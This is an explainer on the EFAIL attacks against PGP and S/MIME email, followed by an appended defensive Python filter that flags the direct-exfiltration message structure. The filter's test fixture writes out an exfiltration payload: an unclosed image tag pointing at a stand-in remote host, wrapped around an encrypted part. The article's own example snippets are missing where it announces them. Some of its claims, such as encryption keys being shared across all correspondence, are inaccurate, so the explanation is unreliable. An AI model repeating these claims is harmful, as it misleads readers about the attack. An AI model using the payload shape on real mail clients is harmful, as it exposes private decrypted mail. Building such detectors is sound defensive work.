A Brief History of Email
Electronic mail, commonly referred to as e-mail, is a method of communication that transmits data from one client to another. Although groundbreaking at the time and still considered the Internet's killer app, the limited in-transit protection that email gets from the Transport Layer Security (TLS) protocol has proven insufficient for transmitting sensitive information. To address this security risk, the OpenPGP community developed an end-to-end encryption protocol called PGP, short for Pretty Good Privacy. There is also another standard for email encryption called S/MIME, which is popular in corporate settings.
Up until May 2018, the PGP and S/MIME encryption standards were lauded as flawless. But German researchers at the Münster University of Applied Sciences discovered that, regardless of an email's age, its encryption key is shared across all correspondence. All that is needed for an EFAIL attack is access to a previously encrypted email, which can be gained through backup servers, phishing attacks or eavesdropping on network traffic. The exploit itself is carried out the same way each time.
Types of EFAIL Attacks
There are currently two types of EFAIL attacks. The first, known as Direct Exfiltration, causes the plaintext of an encrypted email to be transmitted directly to the attacker. Email clients such as Mozilla Thunderbird, iOS Mail and Apple Mail are known to be susceptible to direct exfiltration.
Here is how direct exfiltration works. The attacker starts by composing an email with three (3) parts. The first is an HTML image tag, <img>, whose source attribute (src) is opened but left unterminated. An example might look like this:
The purpose of this is to tell the email client that an image is present at the given link; it is the start of a request for an external image.
The second part of the attacker's email contains the ciphertext, that is, the PGP- or S/MIME-encrypted message. It might look something like this:
Content-Type: application/pkcs7-mime;
Finally, the third part of the attacker’s email simply closes the image tag. The final content of the email…
Content-Type: application/pkcs7-mime;
…can now be sent to an unsuspecting victim. The victim's email client automatically decrypts the ciphertext and, when rendering the result, requests the image from the attacker's IP address or domain name with the decrypted plaintext appended to the URL as an encoded string…
…where '%20' is the URL encoding of a space.
The CBC/CFB Gadget Attack
The second type of EFAIL attack is known as the CBC/CFB Gadget Attack. It takes advantage of vulnerabilities in the OpenPGP and S/MIME specifications themselves. The result, however, is much like that of the direct exfiltration method: the plaintext of encrypted emails is exfiltrated.
CBC (Cipher Block Chaining) and CFB (Cipher Feedback) are both block cipher modes of operation. In CBC mode, an attacker who knows a block of the plaintext precisely can change the plaintext that the recipient decrypts. This method requires a high degree of precision.
Most emails encrypted with the S/MIME protocol start with "Content-type: multipart/signed". This tells the attacker that a complete, known block of plaintext is present, which can be replaced with a block of zeros (0). Doing this repeatedly, the attacker inserts an HTML image tag into the encrypted plaintext. The result of this complex process is a fully encrypted body which, as soon as the victim opens the email, sends the plaintext to the attacker.
The process is the same for the CFB approach, which is the mode used by PGP encryption. The difference is that the success rate of this attack is almost 100% for S/MIME, while for PGP it is only around 30%. The latter is bound to change as EFAIL research continues.
Strategies to Prevent EFAIL
The easiest way to prevent EFAIL is to disable HTML rendering in your email client. This way, emails with active content cannot transmit data to external destinations. If you really need to see the HTML version of an S/MIME or PGP email, decrypt it in an application other than your email client. This is obviously a short-term fix, but it removes the exfiltration channels in email clients that would otherwise expose you to EFAIL.
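As an added example, not code from the article or from the EFAIL researchers, the following Python check (standard library only) shows how a mail gateway or client-side filter could flag the direct-exfiltration structure described above: an HTML part whose src attribute quote is left open, followed by an encrypted part that the client would decrypt and splice into the rendered body. The two sample messages, the .invalid hostnames and the placeholder ciphertext are constructed for the example; the function names are the example's own.

```python
import re
from email import message_from_string
from email.message import Message

# Content types an email client would decrypt before rendering the body.
ENCRYPTED_TYPES = {
    "application/pkcs7-mime",     # S/MIME enveloped data
    "application/pgp-encrypted",  # PGP/MIME control part
    "multipart/encrypted",        # PGP/MIME container
}

# Constructed sample in the three-part shape the article describes. The
# ciphertext is a placeholder string, not real S/MIME or PGP data.
SUSPICIOUS = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: constructed suspicious sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<img src="http://remote.example.invalid/
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

PLACEHOLDER-CIPHERTEXT
--BOUNDARY
Content-Type: text/html

">
--BOUNDARY--
"""

# Constructed benign sample: an encrypted part with no HTML wrapper around it.
BENIGN = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: constructed benign sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain

Hello, see the encrypted part.
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

PLACEHOLDER-CIPHERTEXT
--BOUNDARY--
"""

# Matches an <img> tag up to the opening quote of its src attribute.
IMG_SRC = re.compile(r'<img\b[^>]*\bsrc\s*=\s*(["\'])', re.IGNORECASE)


def unclosed_src_quotes(html: str) -> int:
    """Count <img> tags whose src quote is opened but never closed.

    An open quote means everything that follows in the rendered body,
    including decrypted text the client splices in, becomes part of the URL.
    """
    count = 0
    for match in IMG_SRC.finditer(html):
        if match.group(1) not in html[match.end():]:
            count += 1
    return count


def part_text(part: Message) -> str:
    """Decode a leaf MIME part to text (empty string for containers)."""
    raw = part.get_payload(decode=True) or b""
    return raw.decode(part.get_content_charset() or "utf-8", errors="replace")


def exfil_findings(raw_message: str) -> list[str]:
    """One finding per encrypted part that follows an HTML part with an open
    src attribute; an empty list means the pattern is absent."""
    msg = message_from_string(raw_message)
    findings = []
    open_src_seen = False
    for index, part in enumerate(msg.walk()):
        ctype = part.get_content_type()
        if ctype == "text/html" and unclosed_src_quotes(part_text(part)):
            open_src_seen = True
        elif ctype in ENCRYPTED_TYPES and open_src_seen:
            findings.append(
                f"part {index}: {ctype} follows an HTML part with an open src attribute"
            )
    return findings


if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, exfil_findings(sample) or "no findings")
```

The check is deliberately structural: it does not need to decrypt anything, only to notice that an encrypted part sits inside an HTML attribute that never terminates. A client that renders plain text only, as the article recommends, never issues the image request in the first place, so this filter is a complementary control rather than a replacement for that setting.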